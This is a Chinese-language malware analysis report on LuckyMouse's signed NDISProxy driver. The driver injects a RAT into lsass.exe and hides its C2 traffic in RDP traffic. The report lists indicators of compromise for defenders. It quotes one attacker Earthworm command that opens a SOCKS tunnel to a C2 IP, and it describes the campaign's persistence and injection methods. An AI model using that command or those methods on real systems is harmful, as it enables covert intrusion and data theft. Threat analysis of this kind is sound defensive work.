當前位置:
首頁 > 新聞 > LuckyMouse使用中國IT公司的證書籤署惡意NDISProxy驅動程序

LuckyMouse使用中國IT公司的證書籤署惡意NDISProxy驅動程序

一、前言

自2018年3月以來,我們發現了幾例感染,在這些感染中未知的特洛伊木馬被注入lsass.exe系統進程內存。這些植入程序由擁有合法數字簽名的32位和64位網路過濾驅動程序NDISProxy注入。有趣的是,這個驅動程序是使用屬於中國的公司LeagSoft的數字證書籤署的,LeagSoft是一家位於廣東深圳的信息安全軟體開發商。我們通過CN-CERT向公司通報了這個問題。

本報告中描述的活動在中亞高層會議召開之前就已經開始,我們認為幕後的行動者仍然關注地區政治。

二、惡意模塊

惡意軟體包含三個不同的模塊:

·自定義C ++安裝程序解密並釋放驅動程序文件至相應的系統目錄,為驅動程序持久性創建Windows自動運行服務,並將加密的內存中特洛伊木馬添加到系統註冊表中。

·網路過濾驅動程序(NDISProxy),用於解密並將特洛伊木馬注入內存並過濾埠3389(遠程桌面協議,RDP)流量,以便將特洛伊木馬的C2通信插入其中。

·最後階段的C ++特洛伊木馬作為HTTPS伺服器,與驅動程序一起工作。通過埠3389和443兩個可能的通信信道被動地等待來自其C2的通信。

安裝程序設置完所有模塊後,NDISProxy驅動程序和RAT一起工作

這些模塊允許攻擊者在受感染的基礎架構中靜默橫向移動,但如果新的受感染主機僅具有LAN IP,則不允許它們與外部C2通信。因此,運營商使用Earthworm SOCKS隧道將受感染主機的LAN連接到外部C2。他們還使用Scanline網路掃描程序查找文件共享(埠135,伺服器消息塊,SMB),用於通過管理員密碼傳播惡意軟體,並記錄鍵盤操作。

三、傳播

到2018年3月底,我們在不同的目標中檢測到了用於此活動的32位dropper的分布情況。但是,我們沒有觀察到任何魚叉式網路釣魚或水坑活動。我們認為運營商通過已經受到控制的網路傳播他們的感染程序。

四、工作原理

1.自定義安裝程序

初始感染程序是32位可移植可執行文件,能夠根據目標安裝32位或64位驅動程序。安裝程序會在同一目錄中的load.log文件中記錄所有安裝過程步驟。它檢查操作系統是否為Windows Vista或更高版本(主要版本等於或大於6),並使用DES(數據加密標準)演算法解密其初始配置。

配置中的一組眾所周知的埠號(HTTP,HTTPS,SMB,POP3S,MSSQL,PPTP和RDP)並沒有使用,這與消息中的「[test]」字元串一起表明此惡意軟體仍處於開發階段。

安裝程序創建信號量(名稱取決於配置)GlobalDoor-ndisproxy-mn並檢查服務(名稱還取決於配置)是否已安裝ndisproxy-mn。如果是,則dropper在load.log中寫入「檢測到door」。運行NDISProxy的自動運行Windows服務是開發人員術語中的「door」。

安裝程序還解密(使用相同的DES)最後一個階段特洛伊木馬的shellcode,並將其保存HKLMSOFTWAREClasses32ndisproxy-mn(或64ndisproxy-mn適應於64位主機)下的三個註冊表值中,名為xxx0,xxx1,xxx2。加密配置保存在註冊表項HKCR
disproxy-mn下的值filterpd-ndisproxy-mn。

初始安裝程序在系統註冊表中保存XOR加密的特洛伊木馬程序的shellcode和DES加密配置

安裝程序會創建相應的自動啟動服務和註冊表項。「Altitude」註冊表值(minifilter驅動程序的唯一ID)設置為321 000,表示Windows中的FSFilter Anti-Virus:

2.NDISProxy網路過濾驅動

這個數字簽名的驅動程序是此活動中使用的最有趣的程序。網路過濾模塊有兩個目的:首先解密並注入RAT;第二,通過RDP埠3389設置其通信信道。

該驅動程序使用VeriSign向LeagSoft頒發的數字證書進行簽名,LeagSoft是一家開發數據丟失防護(DLP)解決方案等信息安全軟體的公司。

該驅動程序廣泛使用第三方公開可用的C源代碼,包括GitHub上提供的Blackbone存儲庫。

驅動程序再次檢查Windows版本是否高於Vista,然後創建名為\Device\ndisproxy-%s的設備(其中「 - 」之後的單詞各不相同,請參閱所有變體的附錄)及其對應的符號鏈接

\DosDevices\Global\ndisproxy-%s。

該驅動程序結合了HKLMSOFTWAREClasses32ndisproxy-mn中所有與木馬相關的註冊表值,並使用六位元組硬編碼值對它們進行XOR。然後,它使用Blackbone庫函數將生成的特洛伊木馬可執行shellcode注入lsass.exe內存。

NDISProxy用作網路流量過濾器引擎,過濾通過RDP埠3389的流量(埠號是硬編碼的)並向其中注入消息。

用戶模式內存中的特洛伊木馬與驅動程序之間的通信將通過DeviceIoControl Windows API函數編寫的自定義控制代碼。除輔助代碼外,還有兩個代碼值得一提:

3.內存C++ Trojan

請注意,此特洛伊木馬程序僅存在於內存中;上面的數據是針對解密的Windows註冊表內容而沒有包括初始shellcode

此RAT由NDISProxy驅動程序從系統註冊表解密並注入lsass.exe進程內存。代碼以shellcode開頭 - 而不是典型的Windows可移植可執行文件Loader,此惡意軟體本身實現了內存映射。

該特洛伊木馬是一個功能齊全的RAT,能夠執行命令執行和下載/上傳文件等常見任務。這是通過幾十個C ++類實現的,例如CMFile,CMFile,CMProcess,TFileDownload,TDrive,TProcessInfo,TSock等。第一階段自定義安裝程序使用相同的類。該木馬使用HTTP Server API在埠443上過濾HTTPS數據包並解析命令。

特洛伊木馬是一個HTTP伺服器,允許LAN連接。它使用SOCKS隧道器與C2通信

攻擊者使用此特洛伊木馬來收集目標數據,進行橫向移動並使用Earthworm隧道創建到其C2的SOCKS隧道。這個工具是公開的,在攻擊者中很受歡迎。鑒於特洛伊木馬本身就是一個HTTPS伺服器,我們認為SOCKS隧道用於沒有外網IP的目標,因此C2能夠發送命令。

五、幕後

我們發現此活動針對的是中亞政府。我們認為這次襲擊具有很強的針對性,與高級別會議有關。我們高度自信的認為LuckyMouse攻擊者使用本報告中描述的NDISProxy工具開展此次新攻擊行動。

特別是,Earthworm隧道的選擇對於攻擊者來說是典型的。此外,攻擊者使用的命令之一(「-s rssocks -d 103.75.190 [。] 28 -e 443」)創建到先前已知的LuckyMouse C2的隧道。此活動中受害者的選擇也與攻擊者所表現出的先前興趣一致。

六、契合當前趨勢

我們觀察到幾個攻擊活動逐漸轉向公開可用工具(如Metasploit或CobaltStrike)和自定義惡意軟體(如本報告中描述的最後階段C ++RAT)的組合。我們還觀察了不同的參與者如何定期從GitHub存儲庫中採用代碼。所有這些結合起來使歸因更加困難。

此活動再次證明了LuckyMouse對中亞的興趣以及關註上海合作組織的政治議程。

IoC

文件Hashes

Droppers-installers

9dc209f66da77858e362e624d0be86b3

dacedff98035f80711c61bc47e83b61d

Auxiliary Earthworm SOCKS隧道工具及Scanline

83c5ff660f2900677e537f9500579965

3a97d9b6f17754dcd38ca7fc89caab04

Domains and IPs

103.75.190[.]28

213.109.87[.]58

信號

GlobalDoor-ndisproxy-mn

GlobalDoor-ndisproxy-help

GlobalDoor-ndisproxy-notify

服務

ndisproxy-mn

ndisproxy-help

ndisproxy-notify

註冊表鍵值

HKLMSOFTWAREClasses32ndisproxy-mn

HKLMSOFTWAREClasses64ndisproxy-mn

HKCR
disproxy-mnfilterpd-ndisproxy-mn

HKLMSOFTWAREClasses32ndisproxy-help

HKLMSOFTWAREClasses64ndisproxy-help

HKCR
disproxy-mnfilterpd-ndisproxy-help

HKLMSOFTWAREClasses32ndisproxy-notify

HKLMSOFTWAREClasses64ndisproxy-notify

HKCR
disproxy-mnfilterpd-ndisproxy-notify

驅動的簽名證書

許多合法的LeagSoft產品都使用以下證書進行簽名。請不要將所有簽名文件視為惡意文件。


喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 嘶吼RoarTalk 的精彩文章:

使用RMS和TeamViewer攻擊工業公司
防禦Mimikatz攻擊的方法介紹

TAG:嘶吼RoarTalk |